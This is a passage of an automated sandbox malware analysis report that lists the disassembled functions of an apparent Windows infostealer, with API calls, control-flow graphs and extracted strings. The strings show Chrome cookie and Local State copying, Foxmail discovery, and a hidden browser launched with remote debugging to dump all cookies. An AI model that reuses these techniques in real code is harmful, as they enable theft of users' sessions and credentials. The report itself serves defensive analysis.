                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,10006E4E), ref: 1000729A
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000729D
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,10006E4E), ref: 100072AE
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 100072B1
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,10006E4E), ref: 100072C2
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 100072C5
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                              • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4236061018-788455005
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 04275e680396dfb4a641f74b6e8e1366635206651eabc041964a765234593f91
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38111F74C01228E9FA61FBF19CEDFA73A98FB40290FA10416F60953060C738564ADF94
                                                                                                                                                                                                                                                                                                                              Function 10001F42 Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 472fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 1097 10001f42-10001f98 call 10004330 CreateDirectoryW call 10004d80 * 2 1104 10001f9a 1097->1104 1105 10001f9c-10001fa0 1097->1105 1104->1105 1106 10001fa2 1105->1106 1107 10001fa4-10001fb4 CopyFileW 1105->1107 1106->1107 1108 10001fc0-10001fe1 1107->1108 1109 10001fb6-10001fbb call 10004160 1107->1109 1111 10001ff0-10002052 call 10003a70 call 100067d0 1108->1111 1112 10001fe3-10001feb call 10004160 1108->1112 1109->1108 1120 100024f0-10002514 call 100038d0 1111->1120 1121 10002058-1000205a 1111->1121 1112->1111 1127 10002523-10002546 1120->1127 1128 10002516-1000251e call 10004160 1120->1128 1122 10002060-10002098 call 10004d80 1121->1122 1129 10002590-1000259a call 1000a5c6 1122->1129 1130 1000209e-100020cf call 10004e80 call 10004cc0 1122->1130 1132 10002552-1000256c 1127->1132 1133 10002548-1000254d call 10004160 1127->1133 1128->1127 1144 100020d1-100020d6 call 10004160 1130->1144 1145 100020db-100020f9 1130->1145 1135 10002578-1000258a 1132->1135 1136 1000256e-10002573 call 10004160 1132->1136 1133->1132 1136->1135 1144->1145 1147 10002105-1000214e call 10004d80 1145->1147 1148 100020fb-10002100 call 10004160 1145->1148 1147->1129 1152 10002154-10002173 call 10004e80 1147->1152 1148->1147 1155 10002175-1000217a call 10004160 1152->1155 1156 1000217f-100021c9 call 10004d80 call 10004cc0 1152->1156 1155->1156 1162 100021d5-1000227c CreateDirectoryW * 2 call 10004330 call 10004d80 * 2 1156->1162 1163 100021cb-100021d0 call 10004160 1156->1163 1162->1129 1171 10002282-100022b0 call 10004e80 call 10004cc0 1162->1171 1163->1162 1176 100022b2 1171->1176 1177 100022b4-100022b8 1171->1177 1176->1177 1178 100022ba 1177->1178 1179 100022bc-100022ce CopyFileW 1177->1179 1178->1179 1180 100022d0-100022d5 call 10004160 1179->1180 1181 100022da-100022f4 1179->1181 1180->1181 1183 10002300-1000231d 1181->1183 1184 100022f6-100022fb call 10004160 1181->1184 1186 1000232c-10002356 1183->1186 1187 1000231f-10002327 call 10004160 1183->1187 1184->1183 1189 10002365-1000238c CopyFileW 1186->1189 1190 10002358-10002360 call 10004160 1186->1190 1187->1186 1191 10002392-100023e8 call 10006e60 CreateFileW 1189->1191 1192 1000244e-10002454 1189->1192 1190->1189 1201 10002405-1000240b 1191->1201 1202 100023ea-100023ff WriteFile CloseHandle 1191->1202 1194 10002460-1000247d 1192->1194 1195 10002456-1000245b call 10004160 1192->1195 1199 1000248c-100024b6 1194->1199 1200 1000247f-10002487 call 10004160 1194->1200 1195->1194 1204 100024c5-100024ea 1199->1204 1205 100024b8-100024c0 call 10004160 1199->1205 1200->1199 1206 1000244b 1201->1206 1207 1000240d-10002416 1201->1207 1202->1201 1204->1120 1204->1122 1205->1204 1206->1192 1209 10002442-10002448 call 1000a956 1207->1209 1210 10002418-1000241b 1207->1210 1209->1206 1211 10002421-10002426 1210->1211 1212 1000258b call 1000daab 1210->1212 1211->1212 1215 1000242c-10002431 1211->1215 1212->1129 1215->1212 1217 10002437-1000243a 1215->1217 1217->1212 1218 10002440 1217->1218 1218->1209
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 10001F5F
                                                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 10001FA8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CopyCreateDirectoryFile
                                                                                                                                                                                                                                                                                                                              • String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
                                                                                                                                                                                                                                                                                                                              • API String ID: 3761107634-3418363220
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d59edb435599a471555a78990484bb1f50df8ad1d5918936d629013e8b7aebb2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20028AB0D002189FEF04CFA4DC85BEEBBB5FF58344F114499E80AAB255DB74AA85CB51
                                                                                                                                                                                                                                                                                                                              Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 1219 411c81-411cca GetModuleFileNameW call 401faa * 3 1226 411ccc-411d56 call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea 1219->1226 1251 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1226->1251 1274 411df8 1251->1274 1275 411dea-411df2 Sleep 1251->1275 1276 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1274->1276 1275->1251 1275->1274 1299 411e9a 1276->1299 1300 411e8c-411e94 Sleep 1276->1300 1301 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1299->1301 1300->1276 1300->1299 1324 411f3c-411f60 1301->1324 1325 411f2e-411f36 Sleep 1301->1325 1326 411f64-411f80 call 401e07 call 41b62a 1324->1326 1325->1301 1325->1324 1331 411f82-411f91 call 401e07 DeleteFileW 1326->1331 1332 411f97-411fb3 call 401e07 call 41b62a 1326->1332 1331->1332 1339 411fd0 1332->1339 1340 411fb5-411fce call 401e07 DeleteFileW 1332->1340 1341 411fd4-411ff0 call 401e07 call 41b62a 1339->1341 1340->1341 1348 411ff2-412004 call 401e07 DeleteFileW 1341->1348 1349 41200a-41200c 1341->1349 1348->1349 1351 412019-412024 Sleep 1349->1351 1352 41200e-412010 1349->1352 1351->1326 1355 41202a-41203c call 408339 1351->1355 1352->1351 1354 412012-412017 1352->1354 1354->1351 1354->1355 1358 412092-4120b1 call 401e13 * 3 1355->1358 1359 41203e-41204c call 408339 1355->1359 1370 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1358->1370 1359->1358 1365 41204e-41205c call 408339 1359->1365 1365->1358 1371 41205e-41208a Sleep call 401e13 * 3 1365->1371 1391 412125-41226f call 41aed8 call 41ad56 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1370->1391 1392 412274-41236b call 41aed8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1370->1392 1371->1226 1385 412090 1371->1385 1385->1370 1461 41236f-4123cf call 401eea call 401e13 call 401eea * 7 1391->1461 1392->1461 1491 4123d4-4123f6 call 401eea * 2 1461->1491
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                                                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 777e3ae233bcc939c22c45d816be283afa53ecf355b2f9b7940a84ed0f82c418
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 777e3ae233bcc939c22c45d816be283afa53ecf355b2f9b7940a84ed0f82c418
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                                                                                                                                                                                                                                                                                              Function 028312EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 02831434
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02831137
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831151
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283115C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283116D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283117C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831193
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 028311D0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindClose.KERNEL32(00000000), ref: 028311DB
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 028314C5
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 028314E0
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 0283150F
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831521
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 02831547
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831553
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 02831579
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831585
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 028315AB
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 028315B7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0feae0147da29fdc9fb5b89dd403ad11d1d60950b666d48b26ed45fec73170a2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6579ff7314ed2f384524053302811614352e9b8eeb16caf2f372e99efc7b1249
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0feae0147da29fdc9fb5b89dd403ad11d1d60950b666d48b26ed45fec73170a2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5781D379A5035CAAEB20DBA4DC49FDE7339EF84B00F0005A6F50DE7190EAB55A84CF95
                                                                                                                                                                                                                                                                                                                              Function 100086B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 195networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 1534 100086b0-100086c0 1535 100086c2-100086c7 1534->1535 1536 1000870b-10008712 1534->1536 1537 10008911-10008915 1535->1537 1538 100086cd-10008708 select 1535->1538 1539 100087a0-100087d0 call 100097d0 recv 1536->1539 1540 10008718-10008762 1536->1540 1545 100087f1-100087f4 1539->1545 1546 100087d2-100087dd WSAGetLastError 1539->1546 1541 10008774-10008798 select 1540->1541 1542 10008764-1000876a 1540->1542 1541->1539 1542->1541 1549 100087f6-100087fe call 100097d0 1545->1549 1550 1000880b-10008840 call 100097d0 closesocket call 1000dd3f call 1000fc8d 1545->1550 1547 10008800-10008809 call 100097d0 1546->1547 1548 100087df-100087ea WSAGetLastError 1546->1548 1558 10008843-10008849 1547->1558 1548->1547 1553 100087ec-100087ef 1548->1553 1549->1539 1550->1558 1553->1545 1561 100088f1-100088f9 1558->1561 1562 1000884f 1558->1562 1561->1537 1563 100088fb-100088ff 1561->1563 1565 10008850-10008869 send 1562->1565 1563->1537 1566 10008901-1000890a closesocket 1563->1566 1568 10008885 1565->1568 1569 1000886b-10008878 WSAGetLastError 1565->1569 1566->1537 1570 100088c1-100088ee closesocket call 1000dd3f call 1000fc8d 1568->1570 1571 10008887-10008891 1568->1571 1569->1561 1572 1000887a-10008881 WSAGetLastError 1569->1572 1570->1561 1573 10008893-10008896 1571->1573 1574 1000889d-1000889f 1571->1574 1572->1561 1576 10008883 1572->1576 1573->1574 1577 10008898-1000889b 1573->1577 1578 100088a1-100088b4 call 1000b3c0 1574->1578 1579 100088b7-100088bd 1574->1579 1576->1568 1577->1579 1578->1579 1579->1565 1582 100088bf 1579->1582 1582->1561
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 100086FE
                                                                                                                                                                                                                                                                                                                              • select.WS2_32(?,00000001,00000000,00000000,?), ref: 10008792
                                                                                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,000005DC,00000000), ref: 100087C5
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100087D2
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100087DF
                                                                                                                                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 1000885F
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10008871
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1000887A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$select$recvsend
                                                                                                                                                                                                                                                                                                                              • String ID: Connection closed!$Connection error!
                                                                                                                                                                                                                                                                                                                              • API String ID: 4255854023-2305758303
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ed442c2dc6cb281fd35b63cc094b2b61bff5b4e8b3b3f7628600f1f37b8170a4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56719272A0060AAFE704DF64CC89B59B7B8FF54380F548226E549D6A55DB70FA90CF90
                                                                                                                                                                                                                                                                                                                              Function 1000267B Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 337sleepprocesssynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100076D0: CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 1000279E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,100278DE,00000000,?,?,?,?), ref: 100028D2
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 10002A9D
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 10002AAB
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABA
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                                              • {"id":2,"method":"Browser.close"}, xrefs: 10002A3B
                                                                                                                                                                                                                                                                                                                              • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 10002A48
                                                                                                                                                                                                                                                                                                                              • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
                                                                                                                                                                                                                                                                                                                              • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
                                                                                                                                                                                                                                                                                                                              • API String ID: 3739829977-2677655338
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b7291dcf0f11a0abeade25543faf2ee7211ea1fae0703eca66f1e80ae6bb4c5a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 11f8c4d24fe82a6f86681b1c4a37eeeb5123bf1d696f215f8944f13cdd62a5a1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7291dcf0f11a0abeade25543faf2ee7211ea1fae0703eca66f1e80ae6bb4c5a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DC1E974D00248DEFF15DBA4DC85BEEBBB5EF05384F108159E40AA325ADB316E45CB62
                                                                                                                                                                                                                                                                                                                              Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
